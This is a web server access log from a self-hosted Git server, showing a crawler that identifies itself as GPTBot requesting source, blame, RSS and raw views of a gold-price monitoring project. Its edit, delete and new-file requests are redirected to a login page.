"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 12073] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12849] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 1494] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 9808] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 9798] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 12950] [Gzip 5.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 9800] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:17:30:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=source" [Client 74.7.227.38] [Length 12444] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=source" [Client 74.7.227.38] [Length 12697] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py?display=source" [Client 74.7.227.38] [Length 13282] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:17:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10887] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 12188] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 19338] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:17:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 12198] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 6846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:53 +0000] - 200 200 